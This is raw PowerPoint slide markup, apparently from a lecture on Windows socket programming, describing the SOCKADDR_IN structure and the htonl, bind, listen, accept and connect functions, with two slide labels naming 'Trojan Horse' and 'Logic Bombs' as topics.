              <a:t>} SOCKADDR_IN, *PSOCKADDR_IN;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5875655" y="1522730"/>
            <a:ext cx="5923280" cy="2214880"/>
            <a:chOff x="10947" y="2338"/>
            <a:chExt cx="9328" cy="3488"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形标注 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10947" y="2338"/>
              <a:ext cx="9329" cy="3488"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -65108"/>
                <a:gd name="adj2" fmla="val -1605"/>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10947" y="2653"/>
              <a:ext cx="9329" cy="2858"/>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SOCKADDR_IN structure specifies a transport address and port for the AF_INET address family.</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微软雅黑" pitchFamily="3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cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3240405" y="1941195"/>
            <a:ext cx="5711190" cy="3220720"/>
            <a:chOff x="4964" y="3057"/>
            <a:chExt cx="8994" cy="5072"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="4964" y="6115"/>
              <a:ext cx="8995" cy="2014"/>
              <a:chOff x="1726" y="2132"/>
              <a:chExt cx="8995" cy="2014"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="圆角矩形 6"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId1"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2238" y="2251"/>
                <a:ext cx="8483"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5" name="椭圆 14"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId2"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1726" y="2132"/>
                <a:ext cx="2014" cy="2014"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="08BDC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21" name="椭圆 20"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId3"/>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27" name="文本框 26"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4"/>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600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="300" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="10BDCC"/>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8" name="文本框 27"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3741" y="2281"/>
                <a:ext cx="6979"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charset="-122"/>
                    <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  </a:rPr>
                  <a:t>Trojan Horse</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charset="-122"/>
                  <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="组合 2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="4964" y="3057"/>
              <a:ext cx="8995" cy="2014"/>
              <a:chOff x="1726" y="2132"/>
              <a:chExt cx="8995" cy="2014"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="圆角矩形 6"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId6"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2238" y="2251"/>
                <a:ext cx="8483"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8" name="椭圆 14"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId7"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1726" y="2132"/>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0" name="椭圆 20"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId8"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1865" y="2271"/>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1" name="文本框 26"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1864" y="2665"/>
                <a:ext cx="1736" cy="949"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
                <a:normAutofit fontScale="875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12" name="文本框 27"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId10"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3741" y="2281"/>
                <a:ext cx="6980"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rPr>
                  <a:t>Logic Bombs</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" sz="3000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  <a:sym typeface="+mn-l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htonl</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975360" y="4410075"/>
            <a:ext cx="7348220" cy="491490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="07A7AF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>[in] hostlong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">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A 32-bit number in host byte order.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="26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1087755" y="1631315"/>
            <a:ext cx="3139440" cy="2399665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>u_long htonl(</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>  [in] u_long hostlong</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5241290" y="1582420"/>
            <a:ext cx="5863590" cy="2496820"/>
            <a:chOff x="8860" y="2520"/>
            <a:chExt cx="9234" cy="3932"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="圆角矩形标注 3"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8860" y="2520"/>
              <a:ext cx="9235" cy="3932"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -66675"/>
                <a:gd name="adj2" fmla="val -1932"/>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9034" y="2960"/>
              <a:ext cx="8887" cy="3052"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
                <a:buSzPct val="150000"/>
                <a:buBlip>
                  <a:blip r:embed="rId5"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3000">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>The htonl function converts a u_long from host to TCP/IP network byte order (which is big-endian).</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="3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bind</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518160" y="3963035"/>
            <a:ext cx="11369675" cy="1574165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="12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s</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A descriptor identifying an unbound socket.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="12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addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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A pointer to a sockaddr structure of the local address to assign to the bound socket.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="12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namelen</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The length, in bytes, of the value pointed to by addr.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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1247775" y="1256665"/>
            <a:ext cx="3738880" cy="2489200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>int bind(</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SOCKET         s,</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const sockaddr *addr,</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int            namelen</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="6436995" y="1552575"/>
            <a:ext cx="4507230" cy="1897380"/>
            <a:chOff x="10137" y="1936"/>
            <a:chExt cx="7098" cy="2988"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="圆角矩形标注 3"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10202" y="1936"/>
              <a:ext cx="6968" cy="2989"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -82347"/>
                <a:gd name="adj2" fmla="val 1087"/>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10137" y="2342"/>
              <a:ext cx="7098" cy="2178"/>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bind function associates a local address with a socket.</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listen</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518160" y="3963035"/>
            <a:ext cx="11369675" cy="1054100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="12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s</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A descriptor identifying a bound, unconnected socket.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="12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backlog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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The maximum length of the queue of pending connections. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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951230" y="1552575"/>
            <a:ext cx="2869565" cy="2009775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>int WSAAPI listen(</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SOCKET s,</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int    backlog</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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="圆角矩形标注 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4929505" y="1609090"/>
            <a:ext cx="6253480" cy="1898015"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -66998"/>
              <a:gd name="adj2" fmla="val -3663"/>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4871085" y="1842135"/>
            <a:ext cx="6370320" cy="1431290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:no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listen function places a socket in a state in which it is listening for an incoming connection.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="280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accept</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67030" y="3811905"/>
            <a:ext cx="11369675" cy="2614930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="6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[in] s</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A descriptor that identifies a socket that has been placed in a listening state with the listen function. The connection is actually made with the socket that is returned by accept.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="6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[out] addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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An optional pointer to a buffer that receives the address of the connecting entity, as known to the communications layer. The exact format of the addr parameter is determined by the address family that was established when the socket from the sockaddr structure was created.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="07A7AF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>[in, out] addrlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>An optional pointer to an integer that contains the length of structure pointed to by the addr parameter.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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1083945" y="1256665"/>
            <a:ext cx="3738880" cy="2489200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>SOCKET WSAAPI accept(</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SOCKET   s,</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[out]     sockaddr *addr,</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out] int      *addrlen</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5657850" y="1552575"/>
            <a:ext cx="5450840" cy="1897380"/>
            <a:chOff x="10137" y="2445"/>
            <a:chExt cx="8584" cy="2988"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="圆角矩形标注 3"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10170" y="2445"/>
              <a:ext cx="8519" cy="2989"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -64813"/>
                <a:gd name="adj2" fmla="val -1890"/>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10137" y="2850"/>
              <a:ext cx="8585" cy="2179"/>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accept function permits an incoming connection attempt on a socket.</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connect</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0" name="Text Box 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367030" y="3995420"/>
            <a:ext cx="11369675" cy="2091690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="10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s</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A descriptor identifying an unconnected socket.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="10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name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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A pointer to the sockaddr structure to which the connection should be established.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="07A7AF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>[in] namelen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">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The length, in bytes, of the sockaddr structure pointed to by the name parameter.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1083945" y="1256665"/>
            <a:ext cx="3738880" cy="2489200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
